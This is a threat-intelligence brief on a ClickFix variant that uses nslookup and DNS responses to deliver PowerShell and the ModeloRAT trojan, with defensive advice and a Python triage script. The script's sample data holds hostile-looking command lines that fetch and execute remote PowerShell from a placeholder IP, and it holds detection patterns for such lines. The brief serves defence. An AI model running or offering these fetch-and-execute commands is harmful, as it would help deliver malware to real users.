What happened
Threat actors have introduced a new ClickFix attack variant that uses DNS queries and the Windows nslookup utility to deliver malware payloads. According to Microsoft Threat Intelligence, victims are instructed to run a command that performs a DNS lookup against an attacker-controlled server, which returns a malicious PowerShell script embedded in the DNS response.
The returned PowerShell command is executed on the system and downloads additional malware from attacker infrastructure. The attack retrieves a ZIP archive containing a Python runtime and scripts that perform reconnaissance on the infected device and domain, establish persistence using startup shortcuts, and ultimately deploy the ModeloRAT remote access trojan.
Unlike earlier ClickFix campaigns that delivered payloads over HTTP, this method uses DNS as a staging and communication channel, allowing attackers to modify payloads dynamically while blending malicious traffic with normal DNS activity.
Who is affected
Windows users who are tricked into running the attacker-supplied nslookup command during a ClickFix social engineering lure. Because the command is typed by the user rather than delivered by an exploit, fully patched systems are affected too; a successful run installs the malware chain and leaves the device under persistent remote control through ModeloRAT.
Why CISOs should care
The use of DNS as a malware delivery channel demonstrates evolving attacker techniques designed to evade detection by blending malicious activity into legitimate network traffic, increasing the difficulty of identifying compromise.
3 practical actions
- Monitor DNS query activity. Alert on nslookup and similar tools being pointed at DNS servers outside the organisation's approved resolvers, on lookups to domains never seen before in the environment, and on DNS responses whose record data looks like script text rather than a name or address.
- Audit PowerShell execution events. Correlate process-creation and script-block logging so that PowerShell launched interactively by a user, particularly with nslookup output fed into Invoke-Expression, is reviewed rather than lost among scheduled and management scripts.
- Educate users on command-based social engineering. Train users never to paste or run commands supplied by a website, pop-up or unsolicited support instruction, and make it easy for them to report such prompts.
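The first two actions above can be expressed as concrete triage logic. The script below is an added example written for this page, not code from Microsoft or from the campaign; it runs over constructed, Sysmon-style process-creation events and constructed DNS answers, flags command lines where nslookup output is fed into PowerShell, and flags record data that looks like a script. The matched command shapes and the use of TXT records as the carrier are assumptions: the page says only that the PowerShell script is embedded in the DNS response and does not quote the exact command victims were given.

```python
"""
Added example: triage logic for the nslookup-based ClickFix variant.

Two checks are shown: (1) process-creation events where nslookup output is
fed into PowerShell, and (2) DNS answers whose record data looks like a
script. All events and DNS answers below are constructed samples, and the
command-line shapes matched are assumptions about how a DNS-delivered
PowerShell payload would be invoked; the page does not quote the exact command.
"""
import re

# nslookup asked for TXT records (assumed carrier type; the page says only
# that the script is "embedded in the DNS response").
TXT_QUERY = re.compile(r"-(?:q|qt|type|querytype)=txt", re.I)
# Ways the looked-up text could be executed instead of merely displayed.
EXEC_SINK = re.compile(
    r"invoke-expression|\biex\b|scriptblock\]::create|\|\s*powershell", re.I
)
# Script-like content inside returned record data.
SCRIPT_IN_RECORD = re.compile(
    r"powershell|invoke-expression|\biex\b|downloadstring|frombase64string|-nop\b|-enc\b",
    re.I,
)
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")
SHELL_SEPARATORS = {"|", ";", "&", "&&", "||"}


def nslookup_args(command_line):
    """Return (query_name, resolver) for the first nslookup call, or None.

    resolver is None when nslookup uses the system-configured DNS server.
    Quotes and parentheses are dropped so 'iex (nslookup ...)' parses too.
    """
    tokens = re.sub(r"[()\"']", " ", command_line).split()
    for i, tok in enumerate(tokens):
        name = tok.lower().rsplit("\\", 1)[-1]
        if name not in ("nslookup", "nslookup.exe"):
            continue
        positional = []
        for arg in tokens[i + 1:]:
            if arg in SHELL_SEPARATORS:
                break
            if not arg.startswith("-"):
                positional.append(arg)
        query = positional[0] if positional else None
        resolver = positional[1] if len(positional) > 1 else None
        return query, resolver
    return None


def triage_process_event(event):
    """Score one Sysmon-ID-1-style event; returns (verdict, reasons)."""
    cmd = event["command_line"]
    reasons = []
    if ("powershell" in event["image"].lower()
            and event.get("parent_image", "").lower().endswith("explorer.exe")):
        reasons.append("PowerShell started interactively from explorer.exe")
    args = nslookup_args(cmd)
    if args is not None:
        if TXT_QUERY.search(cmd):
            reasons.append("nslookup requests TXT records")
        if args[1]:
            reasons.append(f"nslookup sent to an explicit resolver: {args[1]}")
        if EXEC_SINK.search(cmd):
            reasons.append("nslookup output flows into an execution sink")
    if any("execution sink" in r for r in reasons):
        return "alert", reasons
    return ("review" if reasons else "ok"), reasons


def classify_txt_answer(records):
    """Classify record data returned for one query; returns (verdict, reasons)."""
    reasons = []
    for rec in records:
        if SCRIPT_IN_RECORD.search(rec):
            reasons.append("script keywords in record data")
        elif BASE64_BLOB.match(rec.strip()):
            reasons.append("long base64-like record")
    if any("script keywords" in r for r in reasons):
        return "alert", reasons
    return ("review" if reasons else "ok"), reasons


# Constructed samples: documentation IP space and .invalid / example.com names.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (nslookup -q=txt verify.example.invalid 203.0.113.5)"'},
    {"image": r"C:\Windows\System32\nslookup.exe",          # admin checking DMARC
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "nslookup -type=txt _dmarc.example.com"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",    # scheduled task
     "command_line": r"powershell -File C:\Scripts\inventory.ps1"},
]
SAMPLE_TXT = {
    "verify.example.invalid": [
        'powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient)'
        ".DownloadString('http://203.0.113.5/stage2.ps1'))\""],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"],
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, why = triage_process_event(ev)
        print(f"[{verdict:6}] {ev['command_line']}")
        for r in why:
            print("          -", r)
    for name, recs in SAMPLE_TXT.items():
        verdict, why = classify_txt_answer(recs)
        print(f"[{verdict:6}] TXT {name}: {'; '.join(why) or 'no indicators'}")
```

In practice the same functions would be run over exported Sysmon Event ID 1 or Security 4688 command lines and over DNS client or resolver logs. The "review" tier exists deliberately: administrators legitimately query TXT records to check SPF and DMARC, so a TXT lookup on its own is a triage hint, while nslookup output reaching Invoke-Expression is the combination worth an alert.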
